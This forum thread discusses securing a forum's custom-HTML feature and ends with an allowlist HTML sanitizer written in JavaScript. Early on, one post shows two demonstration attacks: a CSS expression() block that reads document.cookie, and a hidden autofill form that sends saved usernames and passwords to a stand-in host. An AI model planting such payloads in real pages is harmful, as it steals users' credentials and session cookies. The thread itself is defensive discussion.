Post by Wormopolis on Mar 14, 2011 18:32:27 GMT -8
heh heh "Barack Obama 08"!
Bones
Code Helper
Posts: 131
Bones said 0 great things
Post by Bones on Mar 28, 2011 20:23:34 GMT -8
[dohtml]IE CSS exploit:<br><br> <[style]>.windowbg {background: url("expression:alert(document.cookie)");}<[/style]>[/dohtml]
[dohtml]Firefox password manager auto-fill-in exploit:<br><br> <div align="left"><form action="http:myserver.com/?stealmypassword"> <div style="opacity:0.5">name(hidden)<input name="username" type="text" value="" > password(hidden)<input name="pass" type="password" value="" ></div><br><br> color(visible)<input type="text" value="enter your favorite color" size="25"> <br><br><input type="submit" value="Click here to send password to some unknown site" title="http:myserver.com/?stealmypassword"> </form></div>[/dohtml]
Post by Wormopolis on Mar 29, 2011 6:50:57 GMT -8
I think form is a tag that should be treated just like script.
Post by Bones on Mar 29, 2011 15:43:14 GMT -8
"I think form is a tag that should be treated just like script."
Agreed. The way I handled HTML security in the AVIP code was to sanitize against a list of allowed tags and attributes, but that is a tad restrictive for a code geared toward appearance, unlike AVIP, which was simply concerned with functionality. I'll disallow <form>, but <input/select/option> can stay. Style tags will also get the cut since they too provide an attack surface (IE expressions) as well as a way to screw with the entire forum's appearance when viewing that thread. Think I should include the RTSP protocol in addition to HTTP(S) and FTP?
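Added example, not code from this thread, from AVIP or from the dohtml code: an allowlist sanitizer in the shape Bones describes, run against the two samples he posted above (the IE `expression()` style block and the autofill form). It keeps a fixed set of tags and attributes, removes `<form>` while leaving `<input>`/`<select>`/`<option>`, drops `<style>` and `<script>` together with their contents, strips event-handler and `style` attributes, and accepts only http(s)/ftp URLs with RTSP as an opt-in. The tag and attribute lists, the `allowRtsp` option and the sample inputs are assumptions made for the example.

```javascript
// Allowlist HTML sanitizer (example code written for this thread; the tag and
// attribute lists below are assumptions, not the forum plugin's real policy).
const ALLOWED_TAGS = new Set(['b', 'i', 'u', 'br', 'div', 'span', 'a', 'img',
                              'input', 'select', 'option']);
const GLOBAL_ATTRS = new Set(['align', 'title', 'size', 'value', 'type', 'name']);
const TAG_ATTRS = new Map([['a', new Set(['href'])], ['img', new Set(['src', 'alt'])]]);
const URL_ATTRS = new Set(['href', 'src', 'action']);
const DROP_WITH_CONTENT = new Set(['script', 'style']); // the body is code, not text
const BASE_SCHEMES = ['http', 'https', 'ftp'];

// Decode numeric character references so "&#106;avascript:" is judged as "javascript:".
function decodeNumeric(s) {
  const toChar = (n) => (n > 0 && n <= 0x10ffff ? String.fromCodePoint(n) : '');
  return s
    .replace(/&#x([0-9a-f]+);?/gi, (_, h) => toChar(parseInt(h, 16)))
    .replace(/&#(\d+);?/g, (_, d) => toChar(Number(d)));
}

// A URL is acceptable if it is relative or its scheme is on the allowlist.
function safeUrl(value, schemes) {
  const v = decodeNumeric(value).replace(/[\u0000-\u0020\u007f]/g, ''); // "java\tscript:"
  const head = v.split(/[/?#]/, 1)[0];             // text before any path, query or fragment
  if (head.includes('&')) return false;            // an undecoded named entity (e.g. &colon;) could hide a scheme
  const colon = v.indexOf(':');
  if (colon === -1) return true;                   // relative URL, stays on the forum's origin
  const scheme = v.slice(0, colon).toLowerCase();
  if (!/^[a-z][a-z0-9+.-]*$/.test(scheme)) return true; // the colon belongs to a path, not a scheme
  return schemes.has(scheme);
}

const escapeText = (s) => s.replace(/</g, '&lt;').replace(/>/g, '&gt;');
const escapeAttr = (s) => s.replace(/"/g, '&quot;').replace(/</g, '&lt;').replace(/>/g, '&gt;');

// Rebuild the attribute list of one tag, keeping only allowlisted names and safe URLs.
function sanitizeAttrs(tag, raw, schemes) {
  const attrRe = /([^\s"'=<>\/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+)))?/g;
  let out = '';
  for (let m; (m = attrRe.exec(raw)) !== null;) {
    const name = m[1].toLowerCase();
    const value = m[2] ?? m[3] ?? m[4] ?? '';
    if (name.startsWith('on')) continue;           // event handlers
    if (name === 'style') continue;                // inline CSS, including IE expression()
    const tagAttrs = TAG_ATTRS.get(tag);
    if (!GLOBAL_ATTRS.has(name) && !(tagAttrs && tagAttrs.has(name))) continue;
    if (URL_ATTRS.has(name) && !safeUrl(value, schemes)) continue;
    out += ` ${name}="${escapeAttr(value)}"`;
  }
  return out;
}

// Tokenize the markup into tags and text; text is escaped, tags are filtered.
// Note: an attribute value containing '>' would confuse this simple tokenizer.
function sanitize(html, opts = {}) {
  const schemes = new Set(opts.allowRtsp ? [...BASE_SCHEMES, 'rtsp'] : BASE_SCHEMES);
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^>]*?)\/?>/g;
  let out = '', last = 0, skipUntil = null;
  for (let m; (m = tagRe.exec(html)) !== null;) {
    const [whole, slash, rawName, rawAttrs] = m;
    const name = rawName.toLowerCase();
    const text = html.slice(last, m.index);
    last = m.index + whole.length;
    if (skipUntil) {                               // inside <script>/<style>: discard everything
      if (slash && name === skipUntil) skipUntil = null;
      continue;
    }
    out += escapeText(text);
    if (DROP_WITH_CONTENT.has(name)) { if (!slash) skipUntil = name; continue; }
    if (!ALLOWED_TAGS.has(name)) continue;         // <form> and unknown tags go, their text stays
    out += slash ? `</${name}>` : `<${name}${sanitizeAttrs(name, rawAttrs, schemes)}>`;
  }
  if (!skipUntil) out += escapeText(html.slice(last)); // an unclosed <style> swallows the rest
  return out;
}

// Constructed inputs modelled on the two samples posted in this thread.
console.log(sanitize('<style>.windowbg{background:url("expression:alert(document.cookie)")}</style>'));
console.log(sanitize('<form action="http://myserver.com/?stealmypassword"><input name="pass" type="password"></form>'));
```

The scheme check decodes numeric references and rejects an `&` in the scheme position because a browser will decode entities in an attribute after the sanitizer has seen the raw text. A production version should sit on a real HTML parser rather than the regex tokenizer used here.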